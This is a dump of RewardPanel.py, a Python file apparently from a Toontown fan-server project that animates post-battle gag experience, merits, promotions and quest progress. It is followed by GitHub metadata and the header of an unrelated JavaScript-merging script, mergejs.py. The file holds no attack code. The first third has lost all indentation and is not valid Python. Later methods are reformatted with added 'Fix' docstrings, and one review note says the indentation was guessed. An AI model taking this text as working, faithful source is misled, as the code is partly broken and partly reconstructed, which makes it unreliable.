self.missedItemFrame.hide()
def initMissedItemFrame(self, toon):
self.endTrackFrame.hide()
self.gagExpFrame.hide()
self.newGagFrame.hide()
self.promotionFrame.hide()
self.questFrame.hide()
self.itemFrame.hide()
self.cogPartFrame.hide()
self.missedItemFrame.show()
def initCogPartFrame(self, toon):
self.endTrackFrame.hide()
self.gagExpFrame.hide()
self.newGagFrame.hide()
self.promotionFrame.hide()
self.questFrame.hide()
self.itemFrame.hide()
self.cogPartFrame.show()
self.cogPartLabel['text'] = ''
self.missedItemFrame.hide()
def initQuestFrame(self, toon, avQuests):
self.endTrackFrame.hide()
self.gagExpFrame.hide()
self.newGagFrame.hide()
self.promotionFrame.hide()
self.questFrame.show()
self.itemFrame.hide()
self.cogPartFrame.hide()
self.missedItemFrame.hide()
for i in xrange(ToontownGlobals.MaxQuestCarryLimit):
questLabel = self.questLabelList[i]
questLabel['text_fg'] = (0, 0, 0, 1)
questLabel.hide()
for i in xrange(len(avQuests)):
questDesc = avQuests[i]
questId, npcId, toNpcId, rewardId, toonProgress = questDesc
quest = Quests.getQuest(questId)
if quest:
questString = quest.getString()
progressString = quest.getProgressString(toon, questDesc)
rewardString = quest.getRewardString(progressString)
rewardString = Quests.fillInQuestNames(rewardString, toNpcId=toNpcId)
completed = quest.getCompletionStatus(toon, questDesc) == Quests.COMPLETE
questLabel = self.questLabelList[i]
questLabel.show()
if base.localAvatar.tutorialAck:
questLabel['text'] = rewardString
if completed:
questLabel['text_fg'] = (0, 0.3, 0, 1)
else:
questLabel['text'] = questString + ' :'
def initGagFrame(self, toon, expList, meritList, noSkip = False):
self.avNameLabel['text'] = toon.getName()
self.endTrackFrame.hide()
self.gagExpFrame.show()
self.newGagFrame.hide()
self.promotionFrame.hide()
self.questFrame.hide()
self.itemFrame.hide()
self.cogPartFrame.hide()
self.missedItemFrame.hide()
trackBarOffset = 0
self.skipButton['state'] = choice(noSkip, DGG.DISABLED, DGG.NORMAL)
for i in xrange(len(SuitDNA.suitDepts)):
meritBar = self.meritBars[i]
meritLabel = self.meritLabels[i]
totalMerits = CogDisguiseGlobals.getTotalMerits(toon, i)
merits = meritList[i]
self.meritIncLabels[i].hide()
promoStatus = toon.promotionStatus[i]
if CogDisguiseGlobals.isSuitComplete(toon.cogParts, i):
if not self.trackBarsOffset:
trackBarOffset = 0.47
self.trackBarsOffset = 1
meritBar.show()
meritLabel.show()
meritLabel.show()
if totalMerits:
meritBar['range'] = totalMerits
meritBar['value'] = merits
if promoStatus != ToontownGlobals.PendingPromotion:
meritBar['text'] = '%s/%s %s' % (merits, totalMerits, TTLocalizer.RewardPanelMeritBarLabels[i])
maxSuitType = SuitDNA.suitsPerDept - 1
maxSuitLevel = (SuitDNA.levelsPerSuit-1) + maxSuitType
if toon.cogLevels[i] == maxSuitLevel:
if promoStatus == ToontownGlobals.PendingPromotion:
meritBar['range'] = 1
meritBar['value'] = 1
meritBar['text'] = TTLocalizer.RewardPanelMeritsMaxed
elif promoStatus == ToontownGlobals.PendingPromotion:
meritBar['range'] = 1
meritBar['value'] = 1
meritBar['text'] = TTLocalizer.RewardPanelPromotionPending
self.resetMeritBarColor(i)
else:
meritBar.hide()
meritLabel.hide()
for i in xrange(len(expList)):
curExp = expList[i]
trackBar = self.trackBars[i]
trackLabel = self.trackLabels[i]
trackIncLabel = self.trackIncLabels[i]
trackBar.setX(trackBar.getX() - trackBarOffset)
trackLabel.setX(trackLabel.getX() - trackBarOffset)
trackIncLabel.setX(trackIncLabel.getX() - trackBarOffset)
trackIncLabel.hide()
if toon.hasTrackAccess(i):
trackBar.show()
if curExp >= ToontownBattleGlobals.UnpaidMaxSkills[i] and toon.getGameAccess() != OTPGlobals.AccessFull:
nextExp = self.getNextExpValue(curExp, i)
trackBar['range'] = nextExp
trackBar['value'] = ToontownBattleGlobals.UnpaidMaxSkills[i]
trackBar['text'] = TTLocalizer.InventoryGuestExp
elif curExp >= ToontownBattleGlobals.regMaxSkill:
nextExp = self.getNextExpValueUber(curExp, i)
trackBar['range'] = nextExp
uberCurrExp = curExp - ToontownBattleGlobals.regMaxSkill
trackBar['value'] = uberCurrExp
trackBar['text'] = TTLocalizer.InventoryUberTrackExp % {'nextExp': ToontownBattleGlobals.MaxSkill - curExp}
else:
nextExp = self.getNextExpValue(curExp, i)
trackBar['range'] = nextExp
trackBar['value'] = curExp
trackBar['text'] = '%s/%s' % (curExp, nextExp)
self.resetBarColor(i)
else:
trackBar.hide()
def incrementExp(self, track, newValue, toon):
    """Paint one animation tick of the gag-experience bar for *track*.

    Called repeatedly (via Func intervals) with successively larger
    newValue to animate the bar filling up.
    """
    trackBar = self.trackBars[track]
    oldValue = trackBar['value']
    # Never display more than the absolute cap.
    newValue = min(ToontownBattleGlobals.MaxSkill, newValue)
    nextExp = self.getNextExpValue(newValue, track)
    if newValue >= ToontownBattleGlobals.UnpaidMaxSkills[track] and toon.getGameAccess() != OTPGlobals.AccessFull:
        # Free-trial accounts are frozen at the unpaid cap: keep the old
        # bar value and show the "lost exp" message instead.
        newValue = oldValue
        trackBar['text'] = TTLocalizer.GuestLostExp
    elif newValue >= ToontownBattleGlobals.regMaxSkill:
        # Past the regular cap the bar switches to "uber" progress,
        # measured relative to regMaxSkill.
        newValue = newValue - ToontownBattleGlobals.regMaxSkill
        nextExp = self.getNextExpValueUber(newValue, track)
        trackBar['text'] = TTLocalizer.InventoryUberTrackExp % {'nextExp': ToontownBattleGlobals.UberSkill - newValue}
    else:
        trackBar['text'] = '%s/%s' % (newValue, nextExp)
    trackBar['range'] = nextExp
    trackBar['value'] = newValue
    # Full-brightness track color while the bar is actively ticking;
    # resetBarColor() dims it back to 80% afterwards.
    trackBar['barColor'] = (ToontownBattleGlobals.TrackColors[track][0],
     ToontownBattleGlobals.TrackColors[track][1],
     ToontownBattleGlobals.TrackColors[track][2],
     1)
def resetBarColor(self, track):
    """Dim the exp bar for *track* back to 80% of its track color (idle state)."""
    r, g, b = ToontownBattleGlobals.TrackColors[track][:3]
    self.trackBars[track]['barColor'] = (r * 0.8, g * 0.8, b * 0.8, 1)
def incrementMerits(self, toon, dept, newValue, totalMerits):
    """Paint one animation tick of the merit bar for cog department *dept*.

    totalMerits of 0/None means no promotion requirement is known, in
    which case the bar is left untouched.
    """
    meritBar = self.meritBars[dept]
    promoStatus = toon.promotionStatus[dept]
    if totalMerits:
        # Clamp so the bar never overshoots the promotion requirement.
        newValue = min(totalMerits, newValue)
        meritBar['range'] = totalMerits
        meritBar['value'] = newValue
        # While a promotion is pending the bar keeps its special label
        # (set elsewhere) instead of the numeric progress text.
        if promoStatus != ToontownGlobals.PendingPromotion:
            meritBar['text'] = '%s/%s %s' % (newValue, totalMerits, TTLocalizer.RewardPanelMeritBarLabels[dept])
def resetMeritBarColor(self, dept):
    """Dim the merit bar for *dept* back to 80% of its department color."""
    r, g, b = DisguisePage.DeptColors[dept][:3]
    self.meritBars[dept]['barColor'] = (r * 0.8, g * 0.8, b * 0.8, 1)
def getRandomCongratsPair(self, toon):
    """Return two distinct congratulation strings for the new-gag panel.

    *toon* is unused but kept for interface compatibility with callers.
    random.sample picks two distinct positions in one call, replacing
    the original choice / remove / choice sequence (same distribution).
    """
    congratsStrings = TTLocalizer.RewardPanelCongratsStrings
    string1, string2 = random.sample(congratsStrings, 2)
    return (string1, string2)
def uberGagInterval(self, toon, track, level):
    """Show the 'ultra gag unlocked' frame for the given track/level."""
    # Bring the new-gag frame forward, hiding every other sub-frame.
    self.endTrackFrame.hide()
    self.gagExpFrame.hide()
    self.newGagFrame.show()
    self.promotionFrame.hide()
    self.questFrame.hide()
    self.itemFrame.hide()
    self.missedItemFrame.hide()
    self.newGagFrame['text'] = TTLocalizer.RewardPanelUberGag % {'gagName': ToontownBattleGlobals.Tracks[track].capitalize(),
     'exp': str(ToontownBattleGlobals.UberSkill),
     'avName': toon.getName()}
    # The congrats lines are filled in later by the interval sequence.
    self.congratsLeft['text'] = ''
    self.congratsRight['text'] = ''
    # Clone the inventory button's icon so the panel owns its own copy
    # (cleanupNewGag() removes it).
    gagOriginal = base.localAvatar.inventory.buttonLookup(track, level)
    self.newGagIcon = gagOriginal.copyTo(self.newGagFrame)
    self.newGagIcon.setPos(0, 0, -0.25)
    self.newGagIcon.setScale(1.5)
def newGag(self, toon, track, level):
    """Show the 'new gag earned' frame for the given track/level."""
    # Bring the new-gag frame forward, hiding every other sub-frame.
    self.endTrackFrame.hide()
    self.gagExpFrame.hide()
    self.newGagFrame.show()
    self.promotionFrame.hide()
    self.questFrame.hide()
    self.itemFrame.hide()
    self.missedItemFrame.hide()
    self.newGagFrame['text'] = TTLocalizer.RewardPanelNewGag % {'gagName': ToontownBattleGlobals.Tracks[track].capitalize(),
     'avName': toon.getName()}
    # The congrats lines are filled in later by the interval sequence.
    self.congratsLeft['text'] = ''
    self.congratsRight['text'] = ''
    # Clone the inventory button's icon so the panel owns its own copy
    # (cleanupNewGag() removes it).
    gagOriginal = base.localAvatar.inventory.buttonLookup(track, level)
    self.newGagIcon = gagOriginal.copyTo(self.newGagFrame)
    self.newGagIcon.setPos(0, 0, -0.25)
    self.newGagIcon.setScale(1.5)
def cleanupNewGag(self):
    """Dismiss the new-gag frame, dropping its icon, and restore the exp bars."""
    self.endTrackFrame.hide()
    if self.newGagIcon:
        self.newGagIcon.removeNode()
        self.newGagIcon = None
    self.gagExpFrame.show()
    for frame in (self.newGagFrame, self.promotionFrame, self.questFrame,
                  self.itemFrame, self.missedItemFrame):
        frame.hide()
    return
def getNewGagIntervalList(self, toon, track, level):
    """Interval list: show the new-gag frame, reveal two congrats lines, clean up."""
    praiseLeft, praiseRight = self.getRandomCongratsPair(toon)
    steps = [Func(self.newGag, toon, track, level)]
    steps.append(Wait(1.0))  # anticipation before the left congrats line
    steps.append(Func(self.congratsLeft.setProp, 'text', praiseLeft))
    steps.append(Wait(1.0))  # anticipation before the right congrats line
    steps.append(Func(self.congratsRight.setProp, 'text', praiseRight))
    steps.append(Wait(1.5))  # let the player read before dismissing
    steps.append(Func(self.cleanupNewGag))
    return steps
def getUberGagIntervalList(self, toon, track, level):
    """Interval list: show the ultra-gag frame, reveal two congrats lines, clean up."""
    praiseLeft, praiseRight = self.getRandomCongratsPair(toon)
    steps = [Func(self.uberGagInterval, toon, track, level)]
    steps.append(Wait(1.0))  # anticipation before the left congrats line
    steps.append(Func(self.congratsLeft.setProp, 'text', praiseLeft))
    steps.append(Wait(1.0))  # anticipation before the right congrats line
    steps.append(Func(self.congratsRight.setProp, 'text', praiseRight))
    steps.append(Wait(1.5))  # let the player read before dismissing
    steps.append(Func(self.cleanupNewGag))
    return steps
def vanishFrames(self):
    """Hide the whole reward panel and every sub-frame at once.

    Fix: the original called self.missedItemFrame.hide() twice; the
    duplicate call has been removed (behavior unchanged).
    """
    self.hide()
    self.endTrackFrame.hide()
    self.gagExpFrame.hide()
    self.newGagFrame.hide()
    self.promotionFrame.hide()
    self.questFrame.hide()
    self.itemFrame.hide()
    self.missedItemFrame.hide()
    self.cogPartFrame.hide()
def endTrack(self, toon, toonList, track):
    """Show the 'track maxed out' announcement with the track's top gag icon.

    NOTE(review): indentation was lost in this dump; reconstructed so that
    only self.show() is gated on the local avatar being in toonList --
    confirm against the original file.
    """
    for t in toonList:
        if t == base.localAvatar:
            self.show()
    self.endTrackFrame.show()
    self.endTrackFrame['text'] = TTLocalizer.RewardPanelEndTrack % {'gagName': ToontownBattleGlobals.Tracks[track].capitalize(),
     'avName': toon.getName()}
    # Clone the top (uber) gag icon for display; cleanIcon() removes it.
    gagLast = base.localAvatar.inventory.buttonLookup(track, ToontownBattleGlobals.UBER_GAG_LEVEL_INDEX)
    self.gagIcon = gagLast.copyTo(self.endTrackFrame)
    self.gagIcon.setPos(0, 0, -0.25)
    self.gagIcon.setScale(1.5)
def cleanIcon(self):
    """Dispose of the gag icon created by endTrack()."""
    self.gagIcon.removeNode()
    self.gagIcon = None
    return
def cleanupEndTrack(self):
    """Dismiss the end-of-track frame and restore the exp-bar frame."""
    for frame in (self.endTrackFrame, self.newGagFrame, self.promotionFrame,
                  self.questFrame, self.itemFrame, self.missedItemFrame):
        frame.hide()
    self.gagExpFrame.show()
def getEndTrackIntervalList(self, toon, toonList, track):
    """Interval list for the end-of-track announcement: show, pause, drop icon."""
    return [Func(self.endTrack, toon, toonList, track),
            Wait(2.0),
            Func(self.cleanIcon)]
def showTrackIncLabel(self, track, earnedSkill, guestWaste = 0):
    """Flash the '+N' / '-N' exp-gain label next to a track bar.

    guestWaste nonzero blanks the label (free-trial exp is discarded);
    earnedSkill of exactly 0 leaves the previous text in place.
    """
    label = self.trackIncLabels[track]
    if guestWaste:
        label['text'] = ''
    elif earnedSkill != 0:
        prefix = '+ ' if earnedSkill > 0 else ' '
        label['text'] = prefix + str(earnedSkill)
    label.show()
def showMeritIncLabel(self, dept, earnedMerits):
    """Flash the '+ N' merit gain label for the given cog department."""
    label = self.meritIncLabels[dept]
    label['text'] = '+ ' + str(earnedMerits)
    label.show()
def getTrackIntervalList(self, toon, track, origSkill, earnedSkill, hasUber, guestWaste = 0):
    """Build the interval list animating exp gain on one gag track.

    Three phases: tick the bar from origSkill to origSkill+earnedSkill,
    pop a 'new gag' frame for each level boundary crossed, then -- if the
    uber threshold was just reached -- play the ultra-gag sequence and
    tick the bar back down (uber exp is consumed).
    """
    if hasUber < 0:
        print (toon.doId, 'Reward Panel received an invalid hasUber from an uberList')
    tickDelay = 1.0 / 60
    intervalList = []
    if origSkill + earnedSkill >= ToontownBattleGlobals.UnpaidMaxSkills[track] and toon.getGameAccess() != OTPGlobals.AccessFull:
        # Free-trial account hit its cap: show how much exp was wasted.
        lostExp = origSkill + earnedSkill - ToontownBattleGlobals.UnpaidMaxSkills[track]
        intervalList.append(Func(self.showTrackIncLabel, track, lostExp, 1))
    else:
        intervalList.append(Func(self.showTrackIncLabel, track, earnedSkill))
    # Phase 1: animate the bar filling over ~0.5s of ticks.
    barTime = 0.5
    numTicks = int(math.ceil(barTime / tickDelay))
    for i in xrange(numTicks):
        t = (i + 1) / float(numTicks)
        newValue = int(origSkill + t * earnedSkill + 0.5)
        intervalList.append(Func(self.incrementExp, track, newValue, toon))
        intervalList.append(Wait(tickDelay))
    intervalList.append(Func(self.resetBarColor, track))
    intervalList.append(Wait(0.1))
    # Phase 2: one 'new gag' announcement per level boundary crossed.
    nextExpValue = self.getNextExpValue(origSkill, track)
    finalGagFlag = 0
    while origSkill + earnedSkill >= nextExpValue and origSkill < nextExpValue and not finalGagFlag:
        if newValue >= ToontownBattleGlobals.UnpaidMaxSkills[track] and toon.getGameAccess() != OTPGlobals.AccessFull:
            # Trial accounts do not actually unlock the gag.
            pass
        elif nextExpValue != ToontownBattleGlobals.MaxSkill:
            intervalList += self.getNewGagIntervalList(toon, track, ToontownBattleGlobals.Levels[track].index(nextExpValue))
        newNextExpValue = self.getNextExpValue(nextExpValue, track)
        if newNextExpValue == nextExpValue:
            # No further threshold -- top of the track.
            finalGagFlag = 1
        else:
            nextExpValue = newNextExpValue
    # Phase 3: uber (level 7) gag just earned -- play the special
    # sequence and drain the consumed exp back off the bar.
    uberIndex = ToontownBattleGlobals.LAST_REGULAR_GAG_LEVEL + 1
    currentSkill = origSkill + earnedSkill
    uberSkill = ToontownBattleGlobals.UberSkill + ToontownBattleGlobals.Levels[track][ToontownBattleGlobals.LAST_REGULAR_GAG_LEVEL + 1]
    if currentSkill >= uberSkill and not hasUber > 0:
        intervalList += self.getUberGagIntervalList(toon, track, ToontownBattleGlobals.LAST_REGULAR_GAG_LEVEL + 1)
        intervalList.append(Wait(0.1))
        skillDiff = currentSkill - ToontownBattleGlobals.Levels[track][ToontownBattleGlobals.LAST_REGULAR_GAG_LEVEL + 1]
        # Drain duration grows logarithmically with the amount drained.
        barTime = math.log(skillDiff + 1)
        numTicks = int(math.ceil(barTime / tickDelay))
        displayedSkillDiff = skillDiff
        if displayedSkillDiff > ToontownBattleGlobals.UberSkill:
            displayedSkillDiff = ToontownBattleGlobals.UberSkill
        intervalList.append(Func(self.showTrackIncLabel, track, -displayedSkillDiff))
        for i in xrange(numTicks):
            t = (i + 1) / float(numTicks)
            newValue = int(currentSkill - t * skillDiff + 0.5)
            intervalList.append(Func(self.incrementExp, track, newValue, toon))
            intervalList.append(Wait(tickDelay * 0.5))
        intervalList.append(Wait(0.1))
    return intervalList
def getMeritIntervalList(self, toon, dept, origMerits, earnedMerits):
    """Build the interval list animating merit gain for one cog department,
    chaining in the promotion announcement if this gain earned one."""
    tickDelay = 1.0 / 60
    intervalList = []
    totalMerits = CogDisguiseGlobals.getTotalMerits(toon, dept)
    neededMerits = 0
    if totalMerits and origMerits != totalMerits:
        neededMerits = totalMerits - origMerits
        # The +N label never shows more than what was still needed.
        intervalList.append(Func(self.showMeritIncLabel, dept, min(neededMerits, earnedMerits)))
    # Animate the bar filling over ~0.5s of ticks.
    barTime = 0.5
    numTicks = int(math.ceil(barTime / tickDelay))
    for i in xrange(numTicks):
        t = (i + 1) / float(numTicks)
        newValue = int(origMerits + t * earnedMerits + 0.5)
        intervalList.append(Func(self.incrementMerits, toon, dept, newValue, totalMerits))
        intervalList.append(Wait(tickDelay))
    intervalList.append(Func(self.resetMeritBarColor, dept))
    intervalList.append(Wait(0.1))
    if toon.cogLevels[dept] < ToontownGlobals.MaxCogSuitLevel:
        # Promotion sequence only when merits were still needed and the
        # toon is now eligible.
        if neededMerits and toon.readyForPromotion(dept):
            intervalList.append(Wait(0.4))
            intervalList += self.getPromotionIntervalList(toon, dept)
    return intervalList
def promotion(self, toon, dept):
    """Show the 'promotion earned' frame with the department's cog icon."""
    # Swap every other sub-frame out and bring the promotion frame up.
    for frame in (self.endTrackFrame, self.gagExpFrame, self.newGagFrame,
                  self.questFrame, self.itemFrame, self.missedItemFrame):
        frame.hide()
    self.promotionFrame.show()
    deptName = SuitDNA.suitDepts[dept]
    self.promotionFrame['text'] = TTLocalizer.RewardPanelPromotion % SuitDNA.suitDeptFullnames[deptName]
    # Clone the matching department icon out of the shared model, then
    # release the model node.
    icons = loader.loadModel('phase_3/models/gui/cog_icons')
    iconNodeNames = ('**/CorpIcon', '**/LegalIcon', '**/MoneyIcon', '**/SalesIcon')
    if 0 <= dept < len(iconNodeNames):
        self.deptIcon = icons.find(iconNodeNames[dept]).copyTo(self.promotionFrame)
    icons.removeNode()
    self.deptIcon.setPos(0, 0, -0.225)
    self.deptIcon.setScale(0.33)
def cleanupPromotion(self):
    """Tear down the promotion frame and restore the gag-exp frame.

    No-op if promotion() never created the department icon.
    """
    if not hasattr(self, 'deptIcon'):
        return
    self.deptIcon.removeNode()
    self.deptIcon = None
    for frame in (self.endTrackFrame, self.newGagFrame, self.promotionFrame,
                  self.questFrame, self.itemFrame, self.missedItemFrame):
        frame.hide()
    self.gagExpFrame.show()
    return
def getPromotionIntervalList(self, toon, dept):
    """Interval list: show the promotion frame, hold 2s, clean up."""
    return [Func(self.promotion, toon, dept),
            Wait(2.0),
            Func(self.cleanupPromotion)]
def getQuestIntervalList(self, toon, deathList, toonList, origQuestsList, itemList, helpfulToonsList=None):
    """Build the interval list that animates quest-progress updates.

    deathList encodes each defeated cog as a flat 4-tuple
    (suitIndex, level, activeToonBits, flags); origQuestsList encodes
    each quest as a flat 5-tuple.  Only quests whose progress changed
    contribute animation steps.

    Fixes vs. original: mutable default [] replaced by a None sentinel
    (the list is only read, so behavior is unchanged); the local named
    `str` no longer shadows the builtin; the inner tick loop no longer
    reuses the outer quest index `i`.
    """
    if helpfulToonsList is None:
        helpfulToonsList = []
    avId = toon.getDoId()
    tickDelay = 0.2
    intervalList = []
    # Toons still present in the battle (slots may be None).
    toonShortList = []
    for t in toonList:
        if t is not None:
            toonShortList.append(t)
    # Decode the flat deathList into one dict per defeated cog.
    cogList = []
    for i in xrange(0, len(deathList), 4):
        cogIndex = deathList[i]
        cogLevel = deathList[i + 1]
        activeToonBits = deathList[i + 2]
        flags = deathList[i + 3]
        activeToonIds = []
        for j in xrange(8):
            if activeToonBits & 1 << j:
                if toonList[j] is not None:
                    activeToonIds.append(toonList[j].getDoId())
        isSkelecog = flags & ToontownBattleGlobals.DLF_SKELECOG
        isForeman = flags & ToontownBattleGlobals.DLF_FOREMAN
        isVP = flags & ToontownBattleGlobals.DLF_VP
        isCFO = flags & ToontownBattleGlobals.DLF_CFO
        isSupervisor = flags & ToontownBattleGlobals.DLF_SUPERVISOR
        isVirtual = flags & ToontownBattleGlobals.DLF_VIRTUAL
        hasRevives = flags & ToontownBattleGlobals.DLF_REVIVES
        if isVP or isCFO:
            # Bosses carry a department index rather than a head type.
            cogType = None
            cogTrack = SuitDNA.suitDepts[cogIndex]
        else:
            cogType = SuitDNA.suitHeadTypes[cogIndex]
            cogTrack = SuitDNA.getSuitDept(cogType)
        cogList.append({'type': cogType,
         'level': cogLevel,
         'track': cogTrack,
         'isSkelecog': isSkelecog,
         'isForeman': isForeman,
         'isVP': isVP,
         'isCFO': isCFO,
         'isSupervisor': isSupervisor,
         'isVirtual': isVirtual,
         'hasRevives': hasRevives,
         'activeToons': activeToonIds})
    try:
        # Best-effort: the place may not exist (e.g. during teardown).
        zoneId = base.cr.playGame.getPlace().getTaskZoneId()
    except:
        zoneId = 0
    # Re-chunk the flat quest list into 5-field descriptors.
    avQuests = []
    for i in xrange(0, len(origQuestsList), 5):
        avQuests.append(origQuestsList[i:i + 5])
    for i in xrange(len(avQuests)):
        questDesc = avQuests[i]
        questId, npcId, toNpcId, rewardId, toonProgress = questDesc
        quest = Quests.getQuest(questId)
        if quest and i < len(self.questLabelList):
            questString = quest.getString()
            progressString = quest.getProgressString(toon, questDesc)
            questLabel = self.questLabelList[i]
            earned = 0
            # Low 16 bits of the progress field hold the counter.
            orig = questDesc[4] & pow(2, 16) - 1
            num = 0
            if quest.getType() == Quests.RecoverItemQuest:
                questItem = quest.getItem()
                if questItem in itemList:
                    earned = itemList.count(questItem)
            else:
                for cogDict in cogList:
                    if cogDict['isVP']:
                        num = quest.doesVPCount(avId, cogDict, zoneId, toonShortList)
                    elif cogDict['isCFO']:
                        num = quest.doesCFOCount(avId, cogDict, zoneId, toonShortList)
                    else:
                        num = quest.doesCogCount(avId, cogDict, zoneId, toonShortList)
                    if num:
                        if base.config.GetBool('battle-passing-no-credit', True):
                            # Only toons that actually helped get credit.
                            if avId in helpfulToonsList:
                                earned += num
                            else:
                                self.notify.debug('avId=%d not getting %d kill cog quest credit' % (avId, num))
                        else:
                            earned += num
            if base.localAvatar.tutorialAck:
                if earned > 0:
                    earned = min(earned, quest.getNumQuestItems() - questDesc[4])
            if earned > 0 or base.localAvatar.tutorialAck == 0 and num == 1:
                # Animate the quest label counting up over ~0.5s.
                barTime = 0.5
                numTicks = int(math.ceil(barTime / tickDelay))
                for tick in xrange(numTicks):
                    t = (tick + 1) / float(numTicks)
                    newValue = int(orig + t * earned + 0.5)
                    questDesc[4] = newValue
                    progressString = quest.getProgressString(toon, questDesc)
                    labelText = '%s : %s' % (questString, progressString)
                    if quest.getCompletionStatus(toon, questDesc) == Quests.COMPLETE:
                        intervalList.append(Func(questLabel.setProp, 'text_fg', (0, 0.3, 0, 1)))
                    intervalList.append(Func(questLabel.setProp, 'text', labelText))
                    intervalList.append(Wait(tickDelay))
    return intervalList
def getItemIntervalList(self, toon, itemList):
    """One (set-label, wait 1s) pair per recovered quest item."""
    steps = []
    for recoveredId in itemList:
        steps.append(Func(self.itemLabel.setProp, 'text', Quests.getItemName(recoveredId)))
        steps.append(Wait(1))
    return steps
def getCogPartIntervalList(self, toon, cogPartList):
    """Interval list announcing the cog-suit part that was just earned."""
    partName = CogDisguiseGlobals.getPartName(cogPartList)
    return [Func(self.cogPartLabel.setProp, 'text', partName), Wait(1)]
def getMissedItemIntervalList(self, toon, missedItemList):
    """One (set-label, wait 1s) pair per quest item that was NOT recovered."""
    steps = []
    for missedId in missedItemList:
        steps.append(Func(self.missedItemLabel.setProp, 'text', Quests.getItemName(missedId)))
        steps.append(Wait(1))
    return steps
def getExpTrack(self, toon, origExp, earnedExp, deathList, origQuestsList, itemList, missedItemList, origMeritList, meritList, partList, toonList, uberEntry, helpfulToonsList, noSkip = False):
    """Assemble the full reward-movie Sequence: gag exp, merits, items,
    missed items, cog parts, quest progress, and end-of-track fanfare.

    Fix: the end-of-track check used `endTracks[i] is 1` (identity
    comparison on an int, a CPython small-int-cache accident); it now
    uses `== 1`.
    """
    track = Sequence(Func(self.initGagFrame, toon, origExp, origMeritList, noSkip=noSkip), Wait(1.0))
    # One end-of-track flag per gag track.
    endTracks = [0] * 7
    trackEnded = 0
    for trackIndex in xrange(len(earnedExp)):
        if earnedExp[trackIndex] > 0 or origExp[trackIndex] >= ToontownBattleGlobals.MaxSkill:
            track += self.getTrackIntervalList(toon, trackIndex, origExp[trackIndex], earnedExp[trackIndex], ToontownBattleGlobals.getUberFlagSafe(uberEntry, trackIndex))
        # Did this gain push the track past its regular maximum?
        maxExp = ToontownBattleGlobals.MaxSkill - ToontownBattleGlobals.UberSkill
        if origExp[trackIndex] < maxExp and earnedExp[trackIndex] + origExp[trackIndex] >= maxExp:
            endTracks[trackIndex] = 1
            trackEnded = 1
    for dept in xrange(len(SuitDNA.suitDepts)):
        if meritList[dept]:
            track += self.getMeritIntervalList(toon, dept, origMeritList[dept], meritList[dept])
    track.append(Wait(0.75))
    itemInterval = self.getItemIntervalList(toon, itemList)
    if itemInterval:
        track.append(Func(self.initItemFrame, toon))
        track.append(Wait(0.25))
        track += itemInterval
        track.append(Wait(0.5))
    missedItemInterval = self.getMissedItemIntervalList(toon, missedItemList)
    if missedItemInterval:
        track.append(Func(self.initMissedItemFrame, toon))
        track.append(Wait(0.25))
        track += missedItemInterval
        track.append(Wait(0.5))
    self.notify.debug('partList = %s' % partList)
    # Any nonzero entry means a new cog-suit part was earned.
    newPart = 0
    for part in partList:
        if part != 0:
            newPart = 1
            break
    if newPart:
        partList = self.getCogPartIntervalList(toon, partList)
        if partList:
            track.append(Func(self.initCogPartFrame, toon))
            track.append(Wait(0.25))
            track += partList
            track.append(Wait(0.5))
    questList = self.getQuestIntervalList(toon, deathList, toonList, origQuestsList, itemList, helpfulToonsList)
    if questList:
        avQuests = []
        for i in xrange(0, len(origQuestsList), 5):
            avQuests.append(origQuestsList[i:i + 5])
        track.append(Func(self.initQuestFrame, toon, copy.deepcopy(avQuests)))
        track.append(Wait(0.25))
        track += questList
        track.append(Wait(0.5))
    track.append(Wait(0.25))
    if trackEnded:
        track.append(Func(self.vanishFrames))
        track.append(Fanfare.makeFanfare(0, toon)[0])
        for i in xrange(len(endTracks)):
            if endTracks[i] == 1:
                track += self.getEndTrackIntervalList(toon, toonList, i)
        track.append(Func(self.cleanupEndTrack))
    return track
def testMovie(self, otherToons=None):
    """Debug helper: play a canned reward movie for the local avatar.

    Not used in normal gameplay.  Fixes vs. original: the getExpTrack
    call was missing its required uberEntry and helpfulToonsList
    arguments (TypeError when invoked) -- 0 and [] are supplied here;
    the mutable default argument [] was replaced by a None sentinel.
    """
    otherToons = otherToons if otherToons is not None else []
    track = Sequence()
    track.append(Func(self.show))
    # Canned data: per-track exp, per-track gains, one encoded cog kill,
    # and empty merit/item/part lists.
    origExp = [1999, 0, 20, 30, 10, 0, 60]
    earnedExp = [2, 0, 2, 6, 1, 0, 8]
    deathList = [3, 1, 3, 0, 2, 2, 1, 1, 30, 2, 1, 0]
    origMeritList = [0, 0, 0, 0]
    meritList = [0, 0, 0, 0]
    expTrack = self.getExpTrack(base.localAvatar, origExp, earnedExp, deathList,
                                [], [], [], origMeritList, meritList, [],
                                [base.localAvatar] + otherToons, 0, [])
    track.append(expTrack)
    if len(track) > 0:
        track.append(Func(self.hide))
        track.append(Func(base.localAvatar.loop, 'neutral'))
        track.append(Func(base.localAvatar.startUpdateSmartCamera))
        track.start()
        base.localAvatar.loop('victory')
        base.localAvatar.stopUpdateSmartCamera()
        base.camera.setPosHpr(0, 8, base.localAvatar.getHeight() * 0.66, 179, 15, 0)
    else:
        self.notify.debug('no experience, no movie.')
    return None
def _handleSkip(self):
    # Broadcast the skip event; whoever is playing the battle movie
    # listens for this and fast-forwards past the reward sequence.
    messenger.send(self.SkipBattleMovieEvent)
| {
"content_hash": "3457b296c68771f66f932f4233307504",
"timestamp": "",
"source": "github",
"line_count": 813,
"max_line_length": 245,
"avg_line_length": 46.141451414514144,
"alnum_prop": 0.6060032522059019,
"repo_name": "linktlh/Toontown-journey",
"id": "28c4d6f892990369986a07d8df7010833b0153e2",
"size": "37513",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "toontown/battle/RewardPanel.py",
"mode": "33261",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
#!/usr/bin/env python
#
# Merge multiple JavaScript source code files into one.
#
# Usage:
# This script requires source files to have dependencies specified in them.
#
# Dependencies are specified with a comment of the form:
#
# // @requires <file path>
#
# e.g.
#
# // @requires Geo/DataSource.js
#
# This script should be executed like so:
#
# mergejs.py <output.js> <directory> [...]
#
# e.g.
#
# mergejs.py openlayers.js Geo/ CrossBrowser/
#
# This example will cause the script to walk the `Geo` and
# `CrossBrowser` directories--and subdirectories thereof--and import
# all `*.js` files encountered. The dependency declarations will be extracted
# and then the source code from imported files will be output to
# a file named `openlayers.js` in an order which fulfils the dependencies
# specified.
#
#
# Note: This is a very rough initial version of this code.
#
# -- Copyright 2005-2010 OpenLayers contributors / OpenLayers project --
#
# TODO: Allow files to be excluded. e.g. `Crossbrowser/DebugMode.js`?
# TODO: Report error when dependency can not be found rather than KeyError.
import re
import os
import sys
SUFFIX_JAVASCRIPT = ".js"

